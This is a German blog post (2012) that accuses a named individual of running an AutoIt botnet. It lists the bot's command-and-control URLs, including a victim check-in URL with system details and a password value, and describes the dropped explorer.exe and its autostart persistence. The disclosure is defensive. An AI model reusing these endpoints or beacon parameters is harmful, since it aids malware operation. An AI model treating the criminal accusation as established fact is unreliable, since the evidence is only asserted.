ACHTUNG: Dieser Post spiegelt den Zustand vom 30.03.2012 gegen 19 Uhr wieder!
Vermutlich wird Maximilian König, sobald er dies sieht, sämtliche Beweise vernichten, ich werde dennoch versuchen soviel wie möglich zu beweisen!
Botnet betrieben von Maximilian König
Maximilian König, Betreiber von DarkMatterAds und DarkMatterSoft betreibt auf bot.darkmatterads.org ein Botnet!
Spreading
Verteilt hat er über die offizielle Newsseite sein Werk, indem er davor warnt und es verlinkt, obwohl er selbst das AutoIt-Script erstellt hat!
Screen: http://www.imagebam.com/image/65d2a4182356438
Link: http://news.darkmatterads.org/hacker-warnung
Aufgerufene Dateien:
http://bot.darkmattersoft.org/test.php
Screen: http://www.imagebam.com/image/1b37b2182353548
http://bot.darkmattersoft.org/version.php
Screen: http://www.imagebam.com/image/d60010182353694
http://bot.darkmattersoft.org/oldfile.php
Screen: http://www.imagebam.com/image/8bda53182353803
http://bot.darkmattersoft.org/file.php
Screen: http://www.imagebam.com/image/162d79182353890
http://bot.darkmattersoft.org/killtime.php
Screen: http://www.imagebam.com/image/69121e182353984
http://bot.darkmattersoft.org/?id=d41d8cd98f00b204e9800998ecf8427e&os=WIN_XP&compname=BIE&username=admi&admin=1&path=C:\Dokumente%20und%20Einstellungen\admi\Anwendungsdaten\explorer.exe&useron=1&pw=Zc1MnoAk7Zi7uZFYc21gWXzcgBLHhe1xnf7jFec0Zi34F
Screen: http://www.imagebam.com/image/e33243182354145
http://bot.darkmattersoft.org/processkill.php
Screen: http://www.imagebam.com/image/967afb182354192
http://bot.darkmattersoft.org/winkill.php
Screen: http://www.imagebam.com/image/ccc202182354252
Adminpanel
http://bot.darkmattersoft.org/admin
(Leider passwortgeschützt)
Geschrieben ist der Bot übrigens mit AutoIT, einer extrem einfachen Scriptsprache.
Gedropped wird eine “explorer.exe” in “C:\Dokumente und Einstellungen\USER\Lokale Einstellungen\Temp” (zumindest unter XP, hatte kein anderes Testsystem) und eine weitere unter “C:\Dokumente und Einstellungen\admi\Anwendungsdaten”. Zu letzterer wird auch ein Autostart-Eintrag erstellt, sodass die Schadsoftware bei jedem Start des Systems mitstartet.
Vollständiger Log der Netzwerkkommunikation: http://ul.to/yvltoha6
Ganz unabhängig davon, dass Maximilian König als Cyberkrimineller einzustufen ist – die Klickvergütung wurde scheinbar auch wieder abgesetzt!
Weitere Posts werden wohl noch folgen…
PS: swedex sorgt für die perfekte Präsentation Ihrer Geschäftsunterlagen.
[...] auf   TCPnet.info Today Interviews 0 Comments Click here to cancel reply. Name [...]
[...] Blogbeitrag TCPNet: Betrüger und Internetkrimineller [...]